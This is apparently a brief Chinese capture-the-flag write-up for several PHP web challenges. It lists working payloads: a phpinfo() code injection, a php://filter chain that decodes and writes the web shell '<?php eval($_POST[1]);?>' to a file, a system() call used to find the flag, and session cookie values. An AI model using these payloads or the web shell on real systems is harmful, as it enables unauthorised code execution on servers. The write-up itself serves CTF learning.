不泄露wp每晚9点更新
热身
?f=phpinfo();
在里面找到secret文件,里面有flag
web1
?content=php://filter/<?|string.strip_tags|convert.base64-decode/resource=?>PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B/../3.php
PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B ----->
PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+ ----->
<?php eval($_POST[1]);?>
1=system("find / -name fl*");
在/flag.txt
web2
Post
session_id=session_id
Cookie
PHPSESSID=HappyNewYear
